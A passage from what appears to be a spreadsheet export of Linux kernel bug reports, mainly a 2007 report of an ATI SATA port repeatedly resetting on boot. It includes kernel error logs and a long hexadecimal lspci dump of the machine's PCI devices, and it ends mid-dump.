over again with bisect only on arch/i386 and ended up at ceb6c46839021d5c7c338d48deac616944660124 as the bad commit. But this file seems to be some kind of finalization of a series of patches ("ACPICA: Remove duplicate table manager")... Steps to reproduce: echo mem /sys/power/state and power on machine again by pressing a key or pushing power-on-button.</t>
  </si>
  <si>
    <t>[sata ati] sata port continually resetting itself on boot</t>
  </si>
  <si>
    <t>2007-03-21 08:04 UTC</t>
  </si>
  <si>
    <t>Eamon Roque</t>
  </si>
  <si>
    <t>2007-06-19 04:27 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: n/a Distribution: Ubuntu 6.10 Hardware Environment: Athlon 64X2 3800+/2.0GhzFSB, ATI Chipset Software Environment: Problem Description: On booting, sata continually resets itself until X.org starts. After following a tip from the lkml, "hard-resetting patch" integrated into kernel. With the "default setting the following message contains "soft" instead of "hard". ata2: hard resetting port [ 269.455979] ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) [ 269.790805] ata2.00: configured for UDMA/100 [ 269.790819] ata2: EH complete [ 269.792142] ata2.00: exception Emask 0x40 SAct 0x0 SErr 0x800 action 0x4 [ 269.792204] ata2.00: (irq_stat 0x40000001) [ 269.792263] ata2.00: cmd a0/01:00:00:00:00/00:00:00:00:00/a0 tag 0 cdb 0x43 data 12 in [ 269.792264] res 51/60:03:00:00:00/00:00:00:00:00/a0 Emask 0x40 (internal error) Steps to reproduce: Boot a kernel 2.6.18 to 2.6.21-rc4-mm1 Here's the output from lspci -vxxx: 00:00.0 Host bridge: ATI Technologies Inc RS480 Host Bridge (rev 10) Subsystem: Hewlett-Packard Company Unknown device 280a Flags: bus master, 66MHz, medium devsel, latency 32 00: 02 10 50 59 06 01 20 22 10 00 00 06 00 20 00 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 42 20 05 00 50: 3c 10 0a 28 00 00 00 00 00 00 00 00 00 00 00 00 60: 5f 00 00 00 00 00 00 00 00 00 00 00 28 00 73 06 70: e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 10 80: 10 0d 00 02 94 14 00 03 20 00 00 00 05 25 00 00 90: 00 00 00 80 45 cd 45 ed 00 80 00 00 01 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 08 00 94 01 60 03 11 11 d0 00 00 00 d0: 25 06 65 00 02 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 ff ff ff ff 7f 00 00 00 00 00 00 00 f0: 00 00 00 00 00 80 80 00 00 00 00 00 00 00 40 01 00:02.0 PCI bridge: ATI Technologies Inc RS480 PCI-X Root Port (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 Memory behind bridge: d1000000-d31fffff Prefetchable memory behind bridge: 00000000c0000000-00000000d0100000 Capabilities: [50] Power Management version 3 Capabilities: [58] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable+ Capabilities: [b0] #0d [0000] Capabilities: [b8] HyperTransport: MSI Mapping Capabilities: [100] Advanced Error Reporting Capabilities: [140] Virtual Channel 00: 02 10 34 5a 07 05 10 00 00 00 04 06 10 00 01 00 10: 00 00 00 00 00 00 00 00 00 02 02 00 f1 01 00 00 20: 00 d1 10 d3 01 c0 11 d0 00 00 00 00 00 00 00 00 30: 00 00 00 00 50 00 00 00 00 00 00 00 ff 00 0a 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 01 58 03 c8 00 00 00 00 10 80 41 01 20 00 00 00 60: 1f 08 00 00 01 0d 00 00 40 00 01 11 00 4b 10 00 70: c0 03 48 00 00 00 00 00 00 00 00 00 00 00 00 00 80: 05 b0 01 00 0c 30 e0 fe 49 41 00 00 00 00 00 00 90: 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 0d b8 00 00 02 10 50 59 08 00 03 a8 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:07.0 PCI bridge: ATI Technologies Inc Unknown device 5a39 (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=3f, subordinate=3f, sec-latency=0 Memory behind bridge: d0200000-d04fffff Capabilities: [50] Power Management version 3 Capabilities: [58] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable+ Capabilities: [b0] #0d [0000] Capabilities: [b8] HyperTransport: MSI Mapping Capabilities: [100] Advanced Error Reporting Capabilities: [140] Virtual Channel 00: 02 10 39 5a 07 05 10 00 00 00 04 06 10 00 01 00 10: 00 00 00 00 00 00 00 00 00 3f 3f 00 f1 01 00 00 20: 20 d0 40 d0 f1 ff 01 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 50 00 00 00 00 00 00 00 ff 00 02 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 01 58 03 c8 00 00 00 00 10 80 41 01 20 00 00 00 60: 1f 08 00 00 11 0c 00 04 40 00 11 10 80 0c 30 00 70: c0 03 48 00 00 00 00 00 00 00 00 00 00 00 00 00 80: 05 b0 01 00 0c 30 e0 fe 51 41 00 00 00 00 00 00 90: 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 0d b8 00 00 02 10 50 59 08 00 03 a8 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:12.0 SATA controller: ATI Technologies Inc Unknown device 4380 (prog-if 01 [AHCI 1.0]) Subsystem: Hewlett-Packard Company Unknown device 2813 Flags: bus master, 66MHz, medium devsel, latency 32, IRQ 22 I/O ports at 1130 [size=8] I/O ports at 1150 [size=4] I/O ports at 1138 [size=8] I/O ports at 1154 [size=4] I/O ports at 1100 [size=16] Memory at d0509000 (32-bit, non-prefetchable) [size=1K] Capabilities: [60] Power Management version 2 Capabilities: [70] #12 [0010] 00: 02 10 80 43 07 01 30 02 00 01 06 01 10 20 00 00 10: 31 11 00 00 51 11 00 00 39 11 00 00 55 11 00 00 20: 01 11 00 00 00 90 50 d0 00 00 00 00 3c 10 13 28 30: 00 00 00 00 60 00 00 00 00 00 00 00 0a 01 00 00 40: 14 00 ac 00 01 00 10 00 01 00 00 00 00 00 00 00 50: 05 70 84 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 01 70 22 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 12 00 10 00 0f 00 00 00 28 01 00 00 23 01 00 00 80: 00 00 00 00 06 00 00 2c 58 20 b4 00 58 20 b4 00 90: 58 20 b4 00 58 20 b4 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 d8 00 00 00 00 00 00 00 d8 00 00 b0: 00 00 00 00 00 d8 00 00 00 00 00 00 00 d8 00 00 c0: 00 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:13.0 USB Controller: ATI Technologies Inc Unknown device 4387 (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Unknown device 280a Flags: bus master, 66MHz, medium devsel, latency 32, IRQ 16 Memory at d0504000 (32-bit, non-prefetchable) [size=4K] 00: 02 10 87 43 07 01 a0 02 00 10 03 0c 10 20 80 00 10: 00 40 50 d0 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 00 00 00 00 00 00 00 00 0b 01 00 00 40: 80 1f 00 00 0a 84 b7 18 07 35 00 00 00 00 00 00 50: 00 1c 00 00 00 00 00 00 ff ff ff ff ff 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 ff 00 00 80 00 00 00 00 00 00 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:13.1 USB Controller: ATI Technologies Inc Unknown device 4388 (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Unknown device 280a Flags: bus master, 66MHz, medium devsel, latency 32, IRQ 17 Memory at d0505000 (32-bit, non-prefetchable) [size=4K] 00: 02 10 88 43 07 01 a0 02 00 10 03 0c 10 20 00 00 10: 00 50 50 d0 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 00 00 00 00 00 00 00 00 0a 02 00 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 23 01 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:13.2 USB Controller: ATI Technologies Inc Unknown device 4389 (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Unknown device 280a Flags: bus master, 66MHz, medium devsel, latency 32, IRQ 18 Memory at d0506000 (32-bit, non-prefetchable) [size=4K] 00: 02 10 89 43 07 01 a0 02 00 10 03 0c 10 20 00 00 10: 00 60 50 d0 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 00 00 00 00 00 00 00 00 0a 03 00 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 23 01 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:13.3 USB Controller: ATI Technologies Inc Unknown device 438a (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Unknown device 280a Flags: bus master, 66MHz, medium devsel, latency 32, IRQ 17 Memory at d0507000 (32-bit, non-prefetchable) [size=4K] 00: 02 10 8a 43 07 01 a0 02 00 10 03 0c 10 20 00 00 10: 00 70 50 d0 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 00 00 00 00 00 00 00 00 0a 02 00 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 23 01 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:13.4 USB Controller: ATI Technologies Inc Unknown device 438b (prog-if 10 [OHCI]) Subsystem: Hewlett-Packard Company Unknown device 280a Flags: bus master, 66MHz, medium devsel, latency 32, IRQ 18 Memory at d0508000 (32-bit, non-prefetchable) [size=4K] 00: 02 10 8b 43 07 01 a0 02 00 10 03 0c 10 20 00 00 10: 00 80 50 d0 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 00 00 00 00 00 00 00 00 0a 03 00 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 23 01 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:13.5 USB Controller: ATI Technologies Inc Unknown device 4386 (prog-if 20 [EHCI]) Subsystem: Hewlett-Packard Company Unknown device 280a Flags: bus master, 66MHz, medium devsel, latency 32, IRQ 19 Memory at d0509800 (32-bit, non-prefetchable) [size=256] Capabilities: [c0] Power Management version 2 Capabilities: [e4] Debug port 00: 02 10 86 43 17 01 b0 02 00 20 03 0c 10 20 00 00 10: 00 98 50 d0 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 c0 00 00 00 00 00 00 00 05 04 00 00 40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50: 40 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 23 01 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 01 00 00 00 00 00 08 c0 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 01 e4 02 7e 00 00 40 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 0a 00 e0 20 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:14.0 SMBus: ATI Technologies Inc Unknown device 4385 (rev 13) Subsystem: Hewlett-Packard Company Unknown device 280a Flags: 66MHz, medium devsel I/O ports at fc00 [size=16] Memory at d0509400 (32-bit, non-prefetchable) [size=1K] Capabilities: [b0] HyperTransport: MSI Mapping 00: 02 10 85 43 03 01 30 02 13 00 05 0c 00 00 80 00 10: 01 fc 00 00 00 94 50 d0 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 40: d4 3b 00 04 00 00 00 00 0f ff 00 00 00 00 00 00 50: f0 0c f0 0e f0 0f f0 0f 11 fc f0 0f 00 00 00 00 60: 01 00 27 00 bf 7d 9e 83 3f 90 00 00 20 00 00 00 70: 00 01 00 00 08 00 c0 fe ff 6f 00 00 23 01 f0 0f 80: f0 01 f0 0f 00 00 00 00 00 00 00 00 8c 00 00 80 90: 01 fc 00 00 b9 ce ff 00 00 00 00 00 00 00 00 00 a0: 00 00 ff ff ff ff f0 09 00 ff 38 02 16 79 20 18 b0: 08 00 02 a8 00 00 00 00 00 00 00 00 f0 0f 08 1a c0: fc ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: d8 0c 00 00 00 00 44 00 00 00 00 00 aa 00 10 03 00:14.1 IDE interface: ATI Technologies Inc Unknown device 438c (prog-if 8f [Master SecP SecO PriP PriO]) Subsystem: Hewlett-Packard Company Unknown device 280a Flags: bus master, 66MHz, medium devsel, latency 32, IRQ 16 I/O ports at 1140 [size=8] I/O ports at 1158 [size=4] I/O ports at 1148 [size=8] I/O ports at 115c [size=4] I/O ports at 1120 [size=16] Capabilities: [70] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- 00: 02 10 8c 43 05 01 30 02 00 8f 01 01 10 20 00 00 10: 41 11 00 00 59 11 00 00 49 11 00 00 5d 11 00 00 20: 21 11 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 70 00 00 00 00 00 00 00 0b 01 00 00 40: 99 99 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 40 00 10 2c 01 07 01 00 00 00 ff ff 0f 00 70: 05 00 00 00 00 00 00 00 00 00 00 00 23 01 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:14.2 Audio device: ATI Technologies Inc Unknown device 4383 Subsystem: Hewlett-Packard Company Unknown device 280a Flags: bus master, slow devsel, latency 32, IRQ 16 Memory at d0500000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Capabilities: [60] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable- 00: 02 10 83 43 06 00 10 04 00 00 03 04 10 20 00 00 10: 04 00 50 d0 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 50 00 00 00 00 00 00 00 0b 00 00 00 40: 00 00 02 00 00 00 00 00 00 00 00 00 01 00 00 00 50: 01 60 42 c8 00 00 00 00 00 00 00 00 00 00 00 00 60: 05 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 23 01 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:14.3 ISA bridge: ATI Technologies Inc Unknown device 438d Subsystem: Hewlett-Packard Company Unknown device 280a Flags: bus master, 66MHz, medium devsel, latency 0 00: 02 10 8d 43 0f 01 20 02 00 00 01 06 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 3c 10 0a 28 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40: 04 00 00 00 ff ff c3 ff 07 ff 42 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 00 08 00 00 0e 00 0f 00 e0 ff ff ff 70: 67 45 23 01 00 00 00 00 01 00 00 00 23 01 00 00 80: 08 00 03 a8 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 e0 d1 fe 00 00 00 00 00 00 00 00 00 00 00 00 b0: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:14.4 PCI bridge: ATI Technologies Inc Unknown device 4384 (prog-if 01 [Subtractive decode]) Flags: bus master, VGA palette snoop, 66MHz, medium devsel, latency 64 Bus: primary=00, secondary=07, subordinate=07, sec-latency=64 00: 02 10 84 43 27 01 a0 02 00 01 04 06 00 40 81 00 10: 00 00 00 00 00 00 00 00 00 07 07 40 f0 00 80 22 20: f0 ff 00 00 f0 ff 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 40: 26 00 3c ff 00 00 00 00 0c 01 3f d1 00 00 00 00 50: 01 00 00 00 08 00 03 a8 00 00 00 00 85 00 ff ff 60: ca 0e 17 00 8a 18 10 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 23 01 00 00 80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 01 00 02 06 e0: 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration Flags: fast devsel Capabilities: [80] HyperTransport: Host or Secondary Interface 00: 22 10 00 11 00 00 10 00 00 00 00 06 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 40: 01 01 01 00 01 01 01 00 01 01 01 00 01 01 01 00 50: 01 01 01 00 01 01 01 00 01 01 01 00 01 01 01 00 60: 00 00 01 00 e4 00 00 00 20 c8 21 0f 0c 00 00 00 70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80: 08 00 01 21 20 00 11 11 22 06 75 80 02 00 00 00 90: 78 01 70 01 00 00 ff 00 07 00 00 00 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map Flags: fast devsel 00: 22 10 01 11 00 00 00 00 00 00 00 06 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40: 03 00 00 00 00 00 7f 00 00 00 00 00 01 00 00 00 50: 00 00 00 00 02 00 00 00 00 00 00 00 03 00 00 00 60: 00 00 00 00 04 00 00 00 00 00 00 00 05 00 00 00 70: 00 00 00 00 06 00 00 00 00 00 00 00 07 00 00 00 80: 03 00 f0 00 00 ff ff 00 03 00 e0 00 80 ff ef 00 90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0: 03 00 80 00 80 ff df 00 03 0a 00 00 00 0b 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 13 10 00 00 00 f0 ff 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0: 03 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller Flags: fast devsel 00: 22 10 02 11 00 00 00 00 00 00 00 06 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40: 00 00 00 00 00 00 00 00 01 00 00 00 01 00 40 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60: 00 00 00 00 e0 3f 38 00 00 00 00 00 00 00 00 00 70: 00 00 00 00 00 00 00 00 46 00 00 00 00 00 00 00 80: 20 00 00 00 00 00 00 00 24 c2 6a ae 20 13 82 00 90: 10 08 01 00 6a 00 00 64 39 00 00 80 00 00 00 00 a0: eb 02 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 b0: 4f f0 a8 88 e6 00 00 00 18 18 80 21 1d 40 2e 88 c0: 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 46 84 2a 7d bc 6f 56 9c ec 62 ce 56 98 39 9f 5d e0: 73 87 91 7e 14 3b 25 16 6f bb ed 56 c9 54 84 7e f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control Flags: fast devsel Capabilities: [f0] #0f [0010] 00: 22 10 03 11 00 00 10 00 00 00 00 06 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 40: ff 3b 04 00 40 00 00 02 00 00 00 00 00 00 00 00 50: 00 00 00 00 00 00 00 00 00 00 00 00 c0 fb af be 60: f7 00 00 00 00 00 1f 00 00 00 00 00 00 00 00 00 70: 11 01 02 51 11 80 00 50 00 2a 00 08 2a 23 00 00 80: 00 00 07 23 13 21 13 21 00 00 00 00 00 00 00 00 90: 00 00 00 00 df 60 00 00 00 81 bf 97 00 00 00 00 a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0: 00 00 00 00 01 a7 0d 00 00 00 a0 00 26 26 26 00 e0: 00 00 00 00 24 1a 4f 00 19 17 00 00 00 00 00 00 f0: 0f 00 10 00 00 04 00 00 02 00 00 00 b2 0f 04 00 02:00.0 VGA compatible controller: nVidia Corporation Unknown device 01d1 (rev a1) (prog-if 00 [VGA]) Subsystem: LeadTek Research Inc. Unknown device 51a4 Flags: bus master, fast devsel, latency 0, IRQ 18 Memory at d1000000 (32-bit, non-prefetchable) [size=16M] Memory at c0000000 (64-bit, prefetchable) [size=256M] Memory at d2000000 (64-bit, non-prefetchable) [size=16M] [virtual] Expansion ROM at d0000000 [disabled] [size=128K] Capabilities: [60] Power Management version 2 Capabilities: [68] Message Signalled Interrupts: 64bit+ Queue=0/0 Enable- Capabilities: [78] Express Endpoint IRQ 0 Capabilities: [100] Virtual Channel Capabilities: [128] Power Budgeting 00: de 10 d1 01 07 01 10 00 a1 00 00 03 00 00 00 00 10: 00 00 00 d1 0c 00 00 c0 00 00 00 00 04 00 00 d2 20: 00 00 00 00 00 00 00 00 00 00 00 00 7d 10 a4 51 30: 00 00 00 00 60 00 00 00 00 00 00 00 